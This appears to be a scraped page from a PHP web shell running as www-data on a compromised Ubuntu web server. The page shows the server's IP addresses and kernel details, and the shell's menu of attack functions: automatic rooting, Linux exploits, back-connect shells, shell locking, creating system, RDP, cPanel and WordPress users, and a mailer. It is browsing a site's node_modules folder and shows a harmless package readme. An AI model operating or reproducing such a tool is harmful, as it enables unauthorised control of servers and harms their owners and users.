Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdg.amatya.biz-8 /
node_modules /
junk /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
718
B
-rw-rw-r--
index.js
1.19
KB
-rw-rw-r--
license
1.08
KB
-rw-rw-r--
package.json
1.63
KB
-rw-rw-r--
readme.md
856
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# junk [](https://travis-ci.org/sindresorhus/junk) > Filter out [system junk files](test.js) like `.DS_Store` and `Thumbs.db` ## Install ``` $ npm install junk ``` ## Usage ```js const {promisify} = require('util'); const fs = require('fs'); const junk = require('junk'); const pReaddir = promisify(fs.readdir); (async () => { const files = await pReaddir('some/path'); console.log(files); //=> ['.DS_Store', 'test.jpg'] console.log(files.filter(junk.not)); //=> ['test.jpg'] })(); ``` ## API ### junk.is(filename) Returns `true` if `filename` matches a junk file. ### junk.not(filename) Returns `true` if `filename` doesn't match a junk file. ### junk.regex Regex used for matching junk files. ## License MIT © [Sindre Sorhus](https://sindresorhus.com)
Close